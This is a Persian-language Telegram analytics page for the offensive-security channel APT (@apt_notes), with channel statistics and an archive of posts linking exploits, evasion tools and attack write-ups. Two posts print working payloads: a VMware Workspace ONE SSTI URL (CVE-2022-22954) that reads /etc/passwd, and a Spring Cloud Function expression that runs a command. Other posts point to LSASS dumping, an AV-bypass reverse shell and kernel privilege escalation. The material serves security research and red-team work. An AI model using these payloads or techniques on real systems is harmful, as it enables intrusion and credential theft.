APT

رفتن به کانال در Telegram

This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat

نمایش بیشتر

روسيا45 631 فناوری و برنامه‌ها8 841...

📈 تحلیل کانال تلگرام APT

کانال APT (@apt_notes) در بخش زبانی انگلیسی بازیگری فعال است. در حال حاضر جامعه شامل 14 674 مشترک است و جایگاه 8 841 را در دسته فناوری و برنامه‌ها و رتبه 45 631 را در منطقه روسيا دارد.

📊 شاخص‌های مخاطب و پویایی

از زمان ایجاد در невідомо، پروژه رشد سریعی داشته و 14 674 مشترک جذب کرده است.

بر اساس آخرین داده‌ها در تاریخ 12 ژوئن, 2026، کانال فعالیت پایداری دارد. در ۳۰ روز گذشته تغییر اعضا برابر 406 و در ۲۴ ساعت گذشته برابر 7 بوده و همچنان دسترسی گسترده‌ای حفظ شده است.

وضعیت تأیید: تأیید نشده
نرخ تعامل (ER): میانگین تعامل مخاطب 49.89% است و در ۲۴ ساعت نخست پس از انتشار، محتوا معمولاً N/A% واکنش نسبت به کل مشترکان کسب می‌کند.
دسترسی پست‌ها: هر پست به طور میانگین 7 313 بازدید دریافت می‌کند. در اولین روز معمولاً 0 بازدید جمع‌آوری می‌شود.
واکنش‌ها و تعامل: مخاطبان به‌طور فعال حمایت می‌کنند؛ میانگین واکنش به هر پست 20 است.

📝 توضیح و سیاست محتوایی

نویسنده این فضا را محل بیان دیدگاه‌های شخصی توصیف می‌کند:
“This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat”

به لطف به‌روزرسانی‌های پرتکرار (آخرین داده در تاریخ 13 ژوئن, 2026)، کانال همواره به‌روز و دارای دسترسی بالاست. تحلیل‌ها نشان می‌دهد مخاطبان به‌طور فعال با محتوا تعامل دارند و آن را به نقطه اثرگذاری مهم در دسته فناوری و برنامه‌ها تبدیل کرده‌اند.

14 674

مشترکین

+724 ساعت

+1007 روز

+40630 روز

7 313

نمایش های پست

اطلاعاتی وجود ندارد24 ساعت

اطلاعاتی وجود ندارد48 ساعت

49.89%

نرخ مشارکت

اطلاعاتی وجود ندارد

پست های در روز

Ads index

beta

آرشیو پست ها

14 669

Coercing NTLM Authentication from SCCM https://posts.specterops.io/coercing-ntlm-authentication-from-sccm-e6e23ea8260a #ad #ntlm #sccm

14 669

VMware Workspace ONE — SSTI (CVE-2022-22954) Successful exploitation could lead to RCE from an unauthenticated user. Payload:

https://victim/catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}

#vmware #workspace #ssti #cve

14 669

AppRecoveryCallback Inject Overwrite a process's recovery callback and invoke a crash to execute https://github.com/Wra7h/ARCInject #av #edr #evasion #inject #csharp

14 669

How NAT traversal works This blog post about NAT and NAT traversal is truly awesome! https://tailscale.com/blog/how-nat-traversal-works/ #howto #nat #blog

14 669

Remotely Dumping Chrome Cookies The method in this blog post does not require the remote debugger or Keychain (macOS)/DPAPI (Windows) access and applies to Chromium-based browsers in general https://cedowens.medium.com/remotely-dumping-chrome-cookies-revisited-b25343257209 #chrome #cookie #dump #blog

14 669

Rockyou for Web Fuzzing This is a wordlist for fuzzing purposes made from the best wordlists currently available, lowercased and deduplicated later with duplicut, added cleaner from BonJarber. The lists used have been some selected within these repositories:

— fuzzdb
— SecLists
— xmendez
— minimaxir
— TheRook
— danielmiessler
— swisskyrepo
— 1N3
— cujanovic
— lavalamp
— ics-default
— jeanphorn
— j3ers3
— nyxxxie
— dirbuster
— dotdotpwn
— hackerone_wordlist
— commonspeak2
— bruteforce-list
— assetnote

https://github.com/six2dez/OneListForAll #web #fuzzing #wordlist

14 669

Unmanaged Code Execution with .NET Dynamic PInvoke https://bohops.com/2022/04/02/unmanaged-code-execution-with-net-dynamic-pinvoke/ #edr #evasion #pinvoke #csharp #blog

14 669

Spring4Shell Scan A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities Features: — Support for lists of URLs. — Fuzzing for more than 10 new Spring4Shell payloads (previously seen tools uses only 1-2 variants). — Fuzzing for HTTP GET and POST methods. — Automatic validation of the vulnerability upon discovery. — Randomized and non-intrusive payloads. — WAF Bypass payloads. https://github.com/fullhunt/spring4shell-scan #spring4shell #spring #scan #tools

14 669

[Blog] Unmanaged Code Execution with .NET Dynamic PInvoke https://bohops.com/2022/04/02/unmanaged-code-execution-with-net-dynamic-pinvoke/ #edr #evasion #pinvoke #csharp

14 669

The Bug Hunter Methodology PDF: https://www.ceos3c.com/wp-content/uploads/2020/06/Bug-Hunter-Methodology-V4-Visualization.pdf #bugbounty #methodology #xmind

14 669

$LOLBIN to dump LSASS Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extens$

LOLBIN to dump LSASS Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions Binary: DumpMinitool.exe #lolbin #lsass #dump

14 669

SpringShell: Spring Core RCE (CVE-2022-22963) PoC Payload:

spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("xcalc")

Research: https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html Exploit: https://github.com/craig/SpringCore0day

#spring #exploit #rce #cve

14 669

Guest User abuse in Azure AD Dear BlueTeam, save yourself from the RedTeam and enable these settings in your Azure tenant! Otherwise, every "Guest" you invite in your Microsoft Team meetings can list users from other groups etc. #azure #teams #guest #redteam #blueteam

14 669

PSSW100AVB This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework. A list of useful Powershell scripts with 100% AV bypass ratio. (At the time of publication). Latest Reverse shell tested on Windows 11 (ReverseShell_2022_03.ps1) https://github.com/tihanyin/PSSW100AVB #av #evasion #amsi #powershell #ps1

14 669

LDAP relays for initial foothold in dire situations https://offsec.almond.consulting/ldap-relays-for-initial-foothold-in-dire-situations.html #ad #relay #attack #adcs #redteam

14 669

CVE-2022-27666 This is the exploit for CVE-2022-27666, a vulnerability that achieves local privilege escalation on the latest Ubuntu Desktop 21.10. Research: https://etenal.me/archives/1825 Exploit: https://github.com/plummm/CVE-2022-27666 #ubuntu #lpe #linux

14 669

Azure Dominance Paths You are looking for a comprehensive map of Azure and Azure AD attack paths? Look no further, this is the right blog for you. https://cloudbrothers.info/en/azure-dominance-paths/ #azure #cloud #redteam #blueteam

14 669

CVE-2022-0995 This is my exploit for CVE-2022-0995, an heap out-of-bounds write in the watch_queue Linux kernel component. It uses the same technique described in https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html. The exploit targets Ubuntu 21.10 with kernel 5.13.0-37. The exploit is not 100% reliable, you may need to run it a couple of times. It may panic the kernel, but during my tests it happened rarely. https://github.com/Bonfee/CVE-2022-0995 #linux #lpe #exploit #cve

14 669

ntTraceControl — Powershell Event Tracing Toolbox Want to simulate any ETW logs using powershell, even the security one? Do you want to import any evtx files into the current eventlog session? ntTraceControl is a set of Powershell commands to forge/generate Windows logs. Simply put, ntTraceControl supports Detection teams by simplifying the testing of detection use cases and alerts without using complex infrastructure, tools, or the testing of vulnerabilities. https://github.com/airbus-cert/ntTraceControl #etw #simulate #powershell #redteam #blueteam

14 669

Windows Event Log Evasion via Native APIs Some native Windows API calls can be used to install services WITHOUT generating correlating entries in the event log. This was seen in Stuxnet. https://www.inversecos.com/2022/03/windows-event-log-evasion-via-native.html #edr #event #log #evasion